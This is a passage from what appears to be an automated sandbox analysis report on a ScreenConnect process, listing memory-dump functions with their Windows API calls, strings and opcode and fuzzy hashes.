                                                                                                              • Snapshot File: hcaresult_8_2_48d0000_ScreenConnect.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: 0u
                                                                                                              • API String ID: 0-3203441087
                                                                                                              • Opcode ID: 99b1b417cb4a98d3a7286055c7694d703f05ce148fd3ff14d2923b4c59e93763
                                                                                                              • Instruction ID: 3d17b1f91e35e01af662bd2d77c2cd64b610ca28c2d647869ee5a06220e9b87e
                                                                                                              • Opcode Fuzzy Hash: 99b1b417cb4a98d3a7286055c7694d703f05ce148fd3ff14d2923b4c59e93763
                                                                                                              • Instruction Fuzzy Hash: D6423C34A00619CFDB54EF68D858AADBBB2FF89300F1146D9E509AB365DB31AD85CF40
                                                                                                              Function 054562E8 Relevance: 1.7, APIs: 1, Instructions: 175COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.4036172965.0000000005450000.00000040.00000800.00020000.00000000.sdmp, Offset: 05450000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_5450000_ScreenConnect.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 817544b3369e012f086227e0fd61590394de9b4a73d4ea613b1eb47e4bd30da7
                                                                                                              • Instruction ID: 416c1c54fd65807e9de2c5568848e48a862c687015e2998b4ced6dc1a9afc46c
                                                                                                              • Opcode Fuzzy Hash: 817544b3369e012f086227e0fd61590394de9b4a73d4ea613b1eb47e4bd30da7
                                                                                                              • Instruction Fuzzy Hash: 85518E71A006058FDB24CF69D880AAEBBF1FF88320F15892ED55AD7651D734E945CBA0
                                                                                                              Function 04F8F6B4 Relevance: 1.6, APIs: 1, Instructions: 123fileCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • CreateFileA.KERNEL32(?,80000000,?,?,?,00000001,00000004), ref: 04F8F7DD
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.4034865347.0000000004F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F80000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_4f80000_ScreenConnect.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: CreateFile
                                                                                                              • String ID:
                                                                                                              • API String ID: 823142352-0
                                                                                                              • Opcode ID: 5fcc3986b2967e57014e7a28db4037615523d0b6468620935a9b6595776f0623
                                                                                                              • Instruction ID: 8a384f55ddf0da57c6f99ad8d696d52e4be0332e628555528702b02f3350d1c6
                                                                                                              • Opcode Fuzzy Hash: 5fcc3986b2967e57014e7a28db4037615523d0b6468620935a9b6595776f0623
                                                                                                              • Instruction Fuzzy Hash: E85107B1D00249DFDB10DFA9C985B9EBBF1FB48304F248129E818AB251D7799846CFA1
                                                                                                              Function 04F8DB48 Relevance: 1.6, APIs: 1, Instructions: 119fileCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • CreateFileA.KERNEL32(?,80000000,?,?,?,00000001,00000004), ref: 04F8F7DD
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.4034865347.0000000004F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F80000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_4f80000_ScreenConnect.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: CreateFile
                                                                                                              • String ID:
                                                                                                              • API String ID: 823142352-0
                                                                                                              • Opcode ID: 56b52b8155c8c54845ca8461b19a3a98e070df05464d03528e8268ca3da0b1a0
                                                                                                              • Instruction ID: 17d803ab390b640b5d88824bd88bc205540d39a45574d60d7dbb72e9e7d1eb44
                                                                                                              • Opcode Fuzzy Hash: 56b52b8155c8c54845ca8461b19a3a98e070df05464d03528e8268ca3da0b1a0
                                                                                                              • Instruction Fuzzy Hash: 3C512871D00249DFEB10DFA9C985B9EBBF1FB48304F14812DE818AB251D775A846CF95
                                                                                                              Function 048DF716 Relevance: 1.6, Strings: 1, Instructions: 366COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.4033162420.00000000048D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048D0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_48d0000_ScreenConnect.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: c"on^
                                                                                                              • API String ID: 0-2939423657
                                                                                                              • Opcode ID: e70fd32f1ca4f12e11bba248fba22916902ac6ca6a7e12dbc899b6a857379e09
                                                                                                              • Instruction ID: 90c869f4f690525e4704447bcb29b7052414c100c8f9baf321d6746c6b551b3f
                                                                                                              • Opcode Fuzzy Hash: e70fd32f1ca4f12e11bba248fba22916902ac6ca6a7e12dbc899b6a857379e09
                                                                                                              • Instruction Fuzzy Hash: 80E17D34B01206DFDB14DF69C454AAE77B2EF88314F148A68D61AEB364DF70E985CB80
                                                                                                              Function 04F818E9 Relevance: 1.6, APIs: 1, Instructions: 97processCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • CreateProcessAsUserW.KERNEL32(?,00000000,00000000,?,?,?,?,?,00000000,?,?), ref: 04F819BF
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.4034865347.0000000004F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F80000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_4f80000_ScreenConnect.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: CreateProcessUser
                                                                                                              • String ID:
                                                                                                              • API String ID: 2217836671-0
                                                                                                              • Opcode ID: ccd77e7663cc41aa0c76f2c31adee55695d44999e2119d93204920f46ae3cbb6
                                                                                                              • Instruction ID: a3258b4f81a5a46383f34d64837f3cc6c72824525bdffba99e685b61afa8f8b2
                                                                                                              • Opcode Fuzzy Hash: ccd77e7663cc41aa0c76f2c31adee55695d44999e2119d93204920f46ae3cbb6
                                                                                                              • Instruction Fuzzy Hash: 3441357690020ADFCF10CFA9D884ADEBBF1FF48310F15852AE958AB250D735A956CF90
                                                                                                              Function 04F80CC0 Relevance: 1.6, APIs: 1, Instructions: 74pipeCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • CreateNamedPipeW.KERNEL32(00000000,?,?,?,?,?,00000001,00000004), ref: 04F80D64
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.4034865347.0000000004F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F80000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_4f80000_ScreenConnect.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: CreateNamedPipe
                                                                                                              • String ID:
                                                                                                              • API String ID: 2489174969-0
                                                                                                              • Opcode ID: 12f3f8af2399fa64da282e56b0960222404433812a69858ce6287d8830b7878f
                                                                                                              • Instruction ID: b7234aa4886595b6a77d853a15ba05a595d3fa68aca9056ed7e845719602bfc8
                                                                                                              • Opcode Fuzzy Hash: 12f3f8af2399fa64da282e56b0960222404433812a69858ce6287d8830b7878f
                                                                                                              • Instruction Fuzzy Hash: F7311476801248EFCB10DF9AD488A8EBFF5FF48310F158019E918AB221D775A51ACF61
                                                                                                              Function 054564F0 Relevance: 1.6, APIs: 1, Instructions: 70COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • ProcessIdToSessionId.KERNEL32(00000000,?), ref: 0545657E
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.4036172965.0000000005450000.00000040.00000800.00020000.00000000.sdmp, Offset: 05450000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_5450000_ScreenConnect.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ProcessSession
                                                                                                              • String ID:
                                                                                                              • API String ID: 3779259828-0
                                                                                                              • Opcode ID: 0d84b47498ef5a97a317fe84e6eb3d803ffd7b51c925289625d3db48b74c15b8
                                                                                                              • Instruction ID: 8644243a62beaa9734e7ad723435e5d8885ff3846989371c453d2415a157cf7e
                                                                                                              • Opcode Fuzzy Hash: 0d84b47498ef5a97a317fe84e6eb3d803ffd7b51c925289625d3db48b74c15b8
                                                                                                              • Instruction Fuzzy Hash: 912123B18003499FCB10CFAAD844B9EBBF4EB89720F11846AE858A7251D378A545CFA1
                                                                                                              Function 04F81F45 Relevance: 1.6, APIs: 1, Instructions: 70pipeCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • ConnectNamedPipe.KERNEL32(00000000), ref: 04F81FC8
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.4034865347.0000000004F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F80000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_4f80000_ScreenConnect.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ConnectNamedPipe
                                                                                                              • String ID:
                                                                                                              • API String ID: 2191148154-0
                                                                                                              • Opcode ID: 6371df550ea4be73a9d86c4c5e2566ff0ce487372bfda24b764bde7a50f943cc
                                                                                                              • Instruction ID: 636e09fd2fe7bc123671fd3686343c70f35ec0fb9e802768f88a1bc7717881b7
                                                                                                              • Opcode Fuzzy Hash: 6371df550ea4be73a9d86c4c5e2566ff0ce487372bfda24b764bde7a50f943cc
                                                                                                              • Instruction Fuzzy Hash: 0F2125B1D04218DFCB14DFA9D498BDEBBF4AF48700F15805AE809AB340DB75A906CFA0
                                                                                                              Function 03701A00 Relevance: 1.6, Strings: 1, Instructions: 316COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.4028787393.0000000003700000.00000040.00000800.00020000.00000000.sdmp, Offset: 03700000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_3700000_ScreenConnect.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: d
                                                                                                              • API String ID: 0-2564639436
                                                                                                              • Opcode ID: f52257458e2442f7a3aacb090a11496fd13afab7ddc81081104fd6b18c8b7801
                                                                                                              • Instruction ID: ab637568eeb1bb45fb6e6a73ba20b6b4f28830a5157894fc553a5e3786219d77
                                                                                                              • Opcode Fuzzy Hash: f52257458e2442f7a3aacb090a11496fd13afab7ddc81081104fd6b18c8b7801
                                                                                                              • Instruction Fuzzy Hash: 46D16078A00705DFCB04DF68C894A9AB7F6FF49314B158699E919AB365DB30EC85CF80
                                                                                                              Function 05455594 Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • K32EnumProcesses.KERNEL32(00000000,00000000,?), ref: 0545649D
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.4036172965.0000000005450000.00000040.00000800.00020000.00000000.sdmp, Offset: 05450000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_5450000_ScreenConnect.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: EnumProcesses
                                                                                                              • String ID:
                                                                                                              • API String ID: 84517404-0
                                                                                                              • Opcode ID: 4a4c32a9e1cac3bfb23e64e4f677876d456c39ff18a9b2f767bb753d024da010
                                                                                                              • Instruction ID: 134833376c601f93e7c13855be3e5bdf081516557bdbb3174661ae9342ca941a
                                                                                                              • Opcode Fuzzy Hash: 4a4c32a9e1cac3bfb23e64e4f677876d456c39ff18a9b2f767bb753d024da010
                                                                                                              • Instruction Fuzzy Hash: EF2145B18002099FDB10CF9AD884BDEFBF4FB49320F51842EE919A7341C338A945CBA4
                                                                                                              Function 04F81F50 Relevance: 1.6, APIs: 1, Instructions: 65pipeCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • ConnectNamedPipe.KERNEL32(00000000), ref: 04F81FC8
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.4034865347.0000000004F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F80000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_4f80000_ScreenConnect.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ConnectNamedPipe
                                                                                                              • String ID:
                                                                                                              • API String ID: 2191148154-0
                                                                                                              • Opcode ID: d0d573af5e04d51d2e1aedaf4c6c68375dc9f6266de6ab9bb27f68ce115163c1
                                                                                                              • Instruction ID: da25f8676a7e89700b13f9d70e95613332ea4e07cfd4d6b41ce65e993274e271
                                                                                                              • Opcode Fuzzy Hash: d0d573af5e04d51d2e1aedaf4c6c68375dc9f6266de6ab9bb27f68ce115163c1
                                                                                                              • Instruction Fuzzy Hash: 6C2104B1D14258DFCB14DFAAD584B9EBBF4AF48700F15805EE808AB340D775A805CFA0
                                                                                                              Function 04F844D1 Relevance: 1.6, APIs: 1, Instructions: 59pipeCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • WaitNamedPipeW.KERNEL32(00000000), ref: 04F8453F
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.4034865347.0000000004F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F80000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_4f80000_ScreenConnect.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: NamedPipeWait
                                                                                                              • String ID:
                                                                                                              • API String ID: 3146367894-0
                                                                                                              • Opcode ID: b111ba1a115793151dd40c818084ed3e32e96c68210f585e113107af8c6773f4
                                                                                                              • Instruction ID: 16b2eb5cc1fd3bcafa27fd1b38bf9f474ae8c9dbf02ca7df021526ed5f2bce4b
                                                                                                              • Opcode Fuzzy Hash: b111ba1a115793151dd40c818084ed3e32e96c68210f585e113107af8c6773f4
                                                                                                              • Instruction Fuzzy Hash: 642149B5C002098FCB10DF9AD844BEEFBF4AB48710F11841ED529BB240D378A545CFA1
                                                                                                              Function 048D0E48 Relevance: 1.6, Strings: 1, Instructions: 306COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.4033162420.00000000048D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048D0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_48d0000_ScreenConnect.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: d
                                                                                                              • API String ID: 0-2564639436
                                                                                                              • Opcode ID: 387e863f3b93b734abd01b8c754cf0f29b2120110f8e5bd7415e2bec82a5f3eb
                                                                                                              • Instruction ID: 302acd6bdcf444a44fb435744cc77d02432b7041bcb0d0ceb90aa841099d1972
                                                                                                              • Opcode Fuzzy Hash: 387e863f3b93b734abd01b8c754cf0f29b2120110f8e5bd7415e2bec82a5f3eb
                                                                                                              • Instruction Fuzzy Hash: 5AC13735700606CFC724DF19C4849AAB7F2FF89314B25CA69E55A9B662DB30FC46CB90
                                                                                                              Function 04F844D8 Relevance: 1.6, APIs: 1, Instructions: 56pipeCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • WaitNamedPipeW.KERNEL32(00000000), ref: 04F8453F
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.4034865347.0000000004F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F80000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_4f80000_ScreenConnect.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: NamedPipeWait
                                                                                                              • String ID:
                                                                                                              • API String ID: 3146367894-0
                                                                                                              • Opcode ID: 90439ce18628051aed60cac5c57722b390428f29b2248383f772480794b636b8
                                                                                                              • Instruction ID: 6bbd9e5a14ef5ff0e62bba74942279c123c86c0e895cd710246814f379644017
                                                                                                              • Opcode Fuzzy Hash: 90439ce18628051aed60cac5c57722b390428f29b2248383f772480794b636b8
                                                                                                              • Instruction Fuzzy Hash: 572127B6C002098FDB10DF9AD844ADEBBF4AB48310F15841ED519AB640D779A545CFA1
                                                                                                              Function 05455588 Relevance: 1.6, APIs: 1, Instructions: 55COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • ProcessIdToSessionId.KERNEL32(00000000,?), ref: 0545657E
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.4036172965.0000000005450000.00000040.00000800.00020000.00000000.sdmp, Offset: 05450000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_5450000_ScreenConnect.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ProcessSession
                                                                                                              • String ID:
                                                                                                              • API String ID: 3779259828-0
                                                                                                              • Opcode ID: 62fa1a29fc13416d11ecb92a2307df78ddfe1c4954f988573e5b66c2cb54ec80
                                                                                                              • Instruction ID: 220c6ed02f1e7fd9987dff7ded890c852d7e09ced933fa92ca0e562d39cd1075
                                                                                                              • Opcode Fuzzy Hash: 62fa1a29fc13416d11ecb92a2307df78ddfe1c4954f988573e5b66c2cb54ec80
                                                                                                              • Instruction Fuzzy Hash: 671100B1C002498FCB10DF9AD844BEEFBF4EB48220F15846AD919A7241D778A945CFA5
                                                                                                              Function 048DE58B Relevance: 1.5, Strings: 1, Instructions: 224COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.4033162420.00000000048D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048D0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_48d0000_ScreenConnect.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: Ccj
                                                                                                              • API String ID: 0-3124003533
                                                                                                              • Opcode ID: cd3116a8ebc9b3a2b87a243e36517bc8ff8ace2a057a20db1b32049e6065dcaa
                                                                                                              • Instruction ID: 68771aab35b9d8644c2eaa7cee841a10b08a363554c5e1a1ceb11c0e5a397e59
                                                                                                              • Opcode Fuzzy Hash: cd3116a8ebc9b3a2b87a243e36517bc8ff8ace2a057a20db1b32049e6065dcaa
                                                                                                              • Instruction Fuzzy Hash: 2CA14B74A00209DFDB14DF68D854AADBBF2EF88300F1485A9E50AEB361DB71AD85CF50
                                                                                                              Function 048DE62C Relevance: 1.4, Strings: 1, Instructions: 175COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.4033162420.00000000048D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048D0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_48d0000_ScreenConnect.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: Ccj
                                                                                                              • API String ID: 0-3124003533
                                                                                                              • Opcode ID: cb5cc8253e721ffdfe967fba3cac8c6a9ba1d8178acdbe5371dd6d96eb6aec1c
                                                                                                              • Instruction ID: f5c7d4e8a8a62dcb9cb8889477aa8f7eb9a1a8394580eb8c2ed3437e4ee3edac
                                                                                                              • Opcode Fuzzy Hash: cb5cc8253e721ffdfe967fba3cac8c6a9ba1d8178acdbe5371dd6d96eb6aec1c
                                                                                                              • Instruction Fuzzy Hash: BE711774A00208DFD754DF68D858AADBBF2EF88300F1485A9E50AEB361DB75AD85CF50
                                                                                                              Function 048D2410 Relevance: 1.4, Strings: 1, Instructions: 117COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.4033162420.00000000048D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048D0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_48d0000_ScreenConnect.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: DUu
                                                                                                              • API String ID: 0-1869729964
                                                                                                              • Opcode ID: 3a844a8d64c4a88e0e7def595863ce1dbccc204181db17794b99265fa245f49e
                                                                                                              • Instruction ID: cb1c81e130f17144dd9bf6cb4effa5a5b1bc2a339417be2a35fa0b320e13bfc7
                                                                                                              • Opcode Fuzzy Hash: 3a844a8d64c4a88e0e7def595863ce1dbccc204181db17794b99265fa245f49e
                                                                                                              • Instruction Fuzzy Hash: 8F41C331E006199FDB15DFA9C8546EEBBB2EF88300F108669E905BB351DB35AD05CBA0
                                                                                                              Function 048DEEBF Relevance: 1.4, Strings: 1, Instructions: 112COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.4033162420.00000000048D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048D0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_48d0000_ScreenConnect.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: Ccj
                                                                                                              • API String ID: 0-3124003533
                                                                                                              • Opcode ID: 5513ff4aef0ad6d20884acf90f9c80eb49a7cc8b077f770cba3b24f227255af8
                                                                                                              • Instruction ID: 131f3b3bfff176a0b28ed5defc3413348f24411ab6b8398b92c50a1fd144d8a5
                                                                                                              • Opcode Fuzzy Hash: 5513ff4aef0ad6d20884acf90f9c80eb49a7cc8b077f770cba3b24f227255af8
                                                                                                              • Instruction Fuzzy Hash: 9C413538A00218CFD754DF28C854BA9B7B2EF89311F1485A9E54AEB361DB71EC81CF50
                                                                                                              Function 048D2FB0 Relevance: 1.4, Strings: 1, Instructions: 108COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.4033162420.00000000048D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048D0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_48d0000_ScreenConnect.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: ~u
                                                                                                              • API String ID: 0-1457475129
                                                                                                              • Opcode ID: bcba39893e749b511c171b01f428a1ee021fbc0c3f68d53b2fbfeee44ce176ba
                                                                                                              • Instruction ID: 6c92327e3346c49e1249f0d4b55a3f4bc6433336b81c3e8f0c55b61306ca08b8
                                                                                                              • Opcode Fuzzy Hash: bcba39893e749b511c171b01f428a1ee021fbc0c3f68d53b2fbfeee44ce176ba
                                                                                                              • Instruction Fuzzy Hash: 3C31D3767012108FC729EF28E95496A77E2FF84724B154AA9E90ACB361DB31EC41CB81
                                                                                                              Function 048DEEB6 Relevance: 1.3, Strings: 1, Instructions: 92COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.4033162420.00000000048D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048D0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_48d0000_ScreenConnect.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: Ccj
                                                                                                              • API String ID: 0-3124003533
                                                                                                              • Opcode ID: ab551085d0c27cdc7a5bcd1e8f14ad8fe4827bd0f79a5002fd51b8c7df202163
                                                                                                              • Instruction ID: a547d4b5a0e6e5f5c7cec716f372c195fdce1e421a0bf3d9b08aba3ae92a4084
                                                                                                              • Opcode Fuzzy Hash: ab551085d0c27cdc7a5bcd1e8f14ad8fe4827bd0f79a5002fd51b8c7df202163
                                                                                                              • Instruction Fuzzy Hash: 3B410278A00208CFD754DF28C858B69B7B2EF89315F1485A9E64AEB361CB71ED85CB40
                                                                                                              Function 048DD6D1 Relevance: 1.3, Strings: 1, Instructions: 91COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.4033162420.00000000048D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048D0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_48d0000_ScreenConnect.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: ~u
                                                                                                              • API String ID: 0-1457475129
                                                                                                              • Opcode ID: 470c1190ed24bbf95a9cfa4da0a0baf05cabad6b48dd5f4ca33beeb2ee7e4ca5
                                                                                                              • Instruction ID: 0be17c5bb83551fba23f152e76be9480ca8f44f7f1a01123150456c8327d2adf
                                                                                                              • Opcode Fuzzy Hash: 470c1190ed24bbf95a9cfa4da0a0baf05cabad6b48dd5f4ca33beeb2ee7e4ca5
                                                                                                              • Instruction Fuzzy Hash: 5131B335B00204CBD704DB7CD4506ADB7E2EF89304B258A6AE50AEB351DF32EC068B91
                                                                                                              Function 048DD78F Relevance: 1.3, Strings: 1, Instructions: 84COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.4033162420.00000000048D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048D0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_48d0000_ScreenConnect.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: ,
                                                                                                              • API String ID: 0-3772416878
                                                                                                              • Opcode ID: 1d4caf637d674084347f98162497376024a4627c08adb249e0eb45745d4eb611
                                                                                                              • Instruction ID: 52680c079e44e61fa32bab582ac3545e369db52184bc284713f6fbe2c1ca2698
                                                                                                              • Opcode Fuzzy Hash: 1d4caf637d674084347f98162497376024a4627c08adb249e0eb45745d4eb611
                                                                                                              • Instruction Fuzzy Hash: D321F679B002148FCB18EB75D81896EB7F6EBC9310F24896CE90AE7395DE359C41CB40
                                                                                                              Function 048DFE94 Relevance: 1.3, Strings: 1, Instructions: 80COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.4033162420.00000000048D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048D0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_48d0000_ScreenConnect.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: ~u
                                                                                                              • API String ID: 0-1457475129
                                                                                                              • Opcode ID: fef35b588973569223c3126d183889b82e53af915527b5f558ee2e2769f86efb
                                                                                                              • Instruction ID: 24d814c31d8eafdca8e3f2532cedef8dee24f71ed9edc6c5862daf6b66d69365
                                                                                                              • Opcode Fuzzy Hash: fef35b588973569223c3126d183889b82e53af915527b5f558ee2e2769f86efb
                                                                                                              • Instruction Fuzzy Hash: D021E630600306DFE715DB65D852AAEBBB2EF81304F048629E609DF3A5DB71AD498791
                                                                                                              Function 048DD7A0 Relevance: 1.3, Strings: 1, Instructions: 80COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.4033162420.00000000048D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048D0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_48d0000_ScreenConnect.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: ,
                                                                                                              • API String ID: 0-3772416878
                                                                                                              • Opcode ID: 71b34810bc9e4cc17cee547294ad01f8eec1f838cee06fc9528c7775da64e882
                                                                                                              • Instruction ID: 8705842b6ade823fa28c8e12a6cac96473d9cc60c3a7fb1960a4bcbbcb654f49
                                                                                                              • Opcode Fuzzy Hash: 71b34810bc9e4cc17cee547294ad01f8eec1f838cee06fc9528c7775da64e882
                                                                                                              • Instruction Fuzzy Hash: 4521C439B002149FDB18EB75D81896EB7F6EBC9710F20856CE906E7395DE359C41CB50
                                                                                                              Function 03706DCB Relevance: 1.3, Strings: 1, Instructions: 77COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.4028787393.0000000003700000.00000040.00000800.00020000.00000000.sdmp, Offset: 03700000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_3700000_ScreenConnect.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: ~u
                                                                                                              • API String ID: 0-1457475129
                                                                                                              • Opcode ID: d4657091e74b9d164fe5ac7917f4a50bee5b14a66e22067fbd390bdc6b656829
                                                                                                              • Instruction ID: 39ac3c8ce1a340a32460564708ef6fc1c081f19fdeb8da5af96d0d6c02f58e19
                                                                                                              • Opcode Fuzzy Hash: d4657091e74b9d164fe5ac7917f4a50bee5b14a66e22067fbd390bdc6b656829
                                                                                                              • Instruction Fuzzy Hash: 0B2125715083848FEB06DB6888355ADBFF6DF8321070980EBC105EB2A3DB359C0587A1
                                                                                                              Function 048D3028 Relevance: 1.3, Strings: 1, Instructions: 58COMMON
